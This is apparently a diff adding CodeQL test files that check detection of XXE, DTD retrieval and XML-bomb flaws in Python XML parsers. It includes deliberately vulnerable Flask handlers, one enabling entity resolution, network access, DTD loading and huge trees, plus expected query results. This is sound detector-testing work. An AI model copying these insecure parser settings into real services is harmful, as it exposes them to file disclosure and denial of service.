+# manual use of feed method
+parser = xml.etree.ElementTree.XMLParser()
+parser.feed(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb'
+parser.feed(data=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb'
+parser.close() # $ decodeOutput=parser.close()
+
+# manual use of feed method on XMLPullParser
+parser = xml.etree.ElementTree.XMLPullParser()
+parser.feed(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb'
+parser.feed(data=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb'
+parser.close() # $ decodeOutput=parser.close()
+
+# note: it's technically possible to use the thing wrapper func `fromstring` with an
+# `lxml` parser, and thereby change what vulnerabilities you are exposed to.. but it
+# seems very unlikely that anyone would do this, so we have intentionally not added any
+# tests for this.

python/ql/test/library-tests/frameworks/stdlib/xml_sax.py

@@ -0,0 +1,64 @@
+from io import StringIO
+import xml.sax
+
+x = "some xml"
+
+class MainHandler(xml.sax.ContentHandler):
+    def __init__(self):
+        self._result = []
+
+    def characters(self, data):
+        self._result.append(data)
+
+xml.sax.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' getAPathArgument=StringIO(..)
+xml.sax.parse(source=StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' getAPathArgument=StringIO(..)
+
+xml.sax.parseString(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb'
+xml.sax.parseString(string=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb'
+
+parser = xml.sax.make_parser()
+parser.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' getAPathArgument=StringIO(..)
+parser.parse(source=StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' getAPathArgument=StringIO(..)
+
+# You can make it vuln to both XXE and DTD retrieval by setting this flag
+# see https://docs.python.org/3/library/xml.sax.handler.html#xml.sax.handler.feature_external_ges
+parser = xml.sax.make_parser()
+parser.setFeature(xml.sax.handler.feature_external_ges, True)
+parser.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' xmlVuln='DTD retrieval' xmlVuln='XXE' getAPathArgument=StringIO(..)
+
+parser = xml.sax.make_parser()
+parser.setFeature(xml.sax.handler.feature_external_ges, False)
+parser.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' getAPathArgument=StringIO(..)
+
+# Forward Type Tracking test
+def func(cond):
+    parser = xml.sax.make_parser()
+    if cond:
+        parser.setFeature(xml.sax.handler.feature_external_ges, True)
+        parser.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' xmlVuln='DTD retrieval' xmlVuln='XXE' getAPathArgument=StringIO(..)
+    else:
+        parser.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' getAPathArgument=StringIO(..)
+
+# make it vuln, then making it safe
+# a bit of an edge-case, but is nice to be able to handle.
+parser = xml.sax.make_parser()
+parser.setFeature(xml.sax.handler.feature_external_ges, True)
+parser.setFeature(xml.sax.handler.feature_external_ges, False)
+parser.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' getAPathArgument=StringIO(..)
+
+def check_conditional_assignment(cond):
+    parser = xml.sax.make_parser()
+    if cond:
+        parser.setFeature(xml.sax.handler.feature_external_ges, True)
+    else:
+        parser.setFeature(xml.sax.handler.feature_external_ges, False)
+    parser.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' xmlVuln='DTD retrieval' xmlVuln='XXE' getAPathArgument=StringIO(..)
+
+def check_conditional_assignment2(cond):
+    parser = xml.sax.make_parser()
+    if cond:
+        flag_value = True
+    else:
+        flag_value = False
+    parser.setFeature(xml.sax.handler.feature_external_ges, flag_value)
+    parser.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' xmlVuln='DTD retrieval' xmlVuln='XXE' getAPathArgument=StringIO(..)

python/ql/test/library-tests/frameworks/xmltodict/ConceptsTest.ql

@@ -0,0 +1,2 @@
+import python
+import experimental.meta.ConceptsTest

python/ql/test/library-tests/frameworks/xmltodict/test.py

@@ -0,0 +1,8 @@
+import xmltodict
+
+x = "some xml"
+
+xmltodict.parse(x) # $ decodeFormat=XML decodeInput=x decodeOutput=xmltodict.parse(..)
+xmltodict.parse(xml_input=x) # $ decodeFormat=XML decodeInput=x decodeOutput=xmltodict.parse(..)
+
+xmltodict.parse(x, disable_entities=False) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xmltodict.parse(..)

python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected

@@ -2,9 +2,6 @@ edges
 | test.py:8:19:8:25 | ControlFlowNode for request | test.py:8:19:8:30 | ControlFlowNode for Attribute |
 | test.py:8:19:8:30 | ControlFlowNode for Attribute | test.py:8:19:8:45 | ControlFlowNode for Subscript |
 | test.py:8:19:8:45 | ControlFlowNode for Subscript | test.py:9:34:9:44 | ControlFlowNode for xml_content |
-| test.py:13:19:13:25 | ControlFlowNode for request | test.py:13:19:13:30 | ControlFlowNode for Attribute |
-| test.py:13:19:13:30 | ControlFlowNode for Attribute | test.py:13:19:13:45 | ControlFlowNode for Subscript |
-| test.py:13:19:13:45 | ControlFlowNode for Subscript | test.py:15:34:15:44 | ControlFlowNode for xml_content |
 | test.py:19:19:19:25 | ControlFlowNode for request | test.py:19:19:19:30 | ControlFlowNode for Attribute |
 | test.py:19:19:19:30 | ControlFlowNode for Attribute | test.py:19:19:19:45 | ControlFlowNode for Subscript |
 | test.py:19:19:19:45 | ControlFlowNode for Subscript | test.py:30:34:30:44 | ControlFlowNode for xml_content |
@@ -13,15 +10,11 @@ nodes
 | test.py:8:19:8:30 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
 | test.py:8:19:8:45 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
 | test.py:9:34:9:44 | ControlFlowNode for xml_content | semmle.label | ControlFlowNode for xml_content |
-| test.py:13:19:13:25 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
-| test.py:13:19:13:30 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
-| test.py:13:19:13:45 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
-| test.py:15:34:15:44 | ControlFlowNode for xml_content | semmle.label | ControlFlowNode for xml_content |
 | test.py:19:19:19:25 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
 | test.py:19:19:19:30 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
 | test.py:19:19:19:45 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
 | test.py:30:34:30:44 | ControlFlowNode for xml_content | semmle.label | ControlFlowNode for xml_content |
 subpaths
 #select
-| test.py:9:34:9:44 | ControlFlowNode for xml_content | test.py:8:19:8:25 | ControlFlowNode for request | test.py:9:34:9:44 | ControlFlowNode for xml_content | $@ XML input is constructed from a $@ and is vulnerable to: XXE. | test.py:9:34:9:44 | ControlFlowNode for xml_content | This | test.py:8:19:8:25 | ControlFlowNode for request | user-provided value |
-| test.py:30:34:30:44 | ControlFlowNode for xml_content | test.py:19:19:19:25 | ControlFlowNode for request | test.py:30:34:30:44 | ControlFlowNode for xml_content | $@ XML input is constructed from a $@ and is vulnerable to: Billion Laughs, DTD retrieval, Quadratic Blowup, XXE. | test.py:30:34:30:44 | ControlFlowNode for xml_content | This | test.py:19:19:19:25 | ControlFlowNode for request | user-provided value |
+| test.py:9:34:9:44 | ControlFlowNode for xml_content | test.py:8:19:8:25 | ControlFlowNode for request | test.py:9:34:9:44 | ControlFlowNode for xml_content | A $@ is parsed as XML without guarding against external entity expansion. | test.py:8:19:8:25 | ControlFlowNode for request | user-provided value |
+| test.py:30:34:30:44 | ControlFlowNode for xml_content | test.py:19:19:19:25 | ControlFlowNode for request | test.py:30:34:30:44 | ControlFlowNode for xml_content | A $@ is parsed as XML without guarding against external entity expansion. | test.py:19:19:19:25 | ControlFlowNode for request | user-provided value |

python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref

@@ -0,0 +1 @@
+Security/CWE-611/Xxe.ql

python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.expected

@@ -0,0 +1,12 @@
+edges
+| test.py:19:19:19:25 | ControlFlowNode for request | test.py:19:19:19:30 | ControlFlowNode for Attribute |
+| test.py:19:19:19:30 | ControlFlowNode for Attribute | test.py:19:19:19:45 | ControlFlowNode for Subscript |
+| test.py:19:19:19:45 | ControlFlowNode for Subscript | test.py:30:34:30:44 | ControlFlowNode for xml_content |
+nodes
+| test.py:19:19:19:25 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
+| test.py:19:19:19:30 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
+| test.py:19:19:19:45 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
+| test.py:30:34:30:44 | ControlFlowNode for xml_content | semmle.label | ControlFlowNode for xml_content |
+subpaths
+#select
+| test.py:30:34:30:44 | ControlFlowNode for xml_content | test.py:19:19:19:25 | ControlFlowNode for request | test.py:30:34:30:44 | ControlFlowNode for xml_content | A $@ is parsed as XML without guarding against uncontrolled entity expansion. | test.py:19:19:19:25 | ControlFlowNode for request | user-provided value |

python/ql/test/query-tests/Security/CWE-776-XmlBomb/XmlBomb.qlref

@@ -0,0 +1 @@
+Security/CWE-776/XmlBomb.ql

python/ql/test/query-tests/Security/CWE-776-XmlBomb/test.py

@@ -0,0 +1,30 @@
+from flask import Flask, request
+import lxml.etree
+
+app = Flask(__name__)
+
+@app.route("/vuln-handler")
+def vuln_handler():
+    xml_content = request.args['xml_content']
+    return lxml.etree.fromstring(xml_content).text
+
+@app.route("/safe-handler")
+def safe_handler():
+    xml_content = request.args['xml_content']
+    parser = lxml.etree.XMLParser(resolve_entities=False)
+    return lxml.etree.fromstring(xml_content, parser=parser).text
+
+@app.route("/super-vuln-handler")
+def super_vuln_handler():
+    xml_content = request.args['xml_content']
+    parser = lxml.etree.XMLParser(
+        # allows XXE
+        resolve_entities=True,
+        # allows remote XXE
+        no_network=False,
+        # together with `no_network=False`, allows DTD-retrival
+        load_dtd=True,
+        # allows DoS attacks
+        huge_tree=True,
+    )
+    return lxml.etree.fromstring(xml_content, parser=parser).text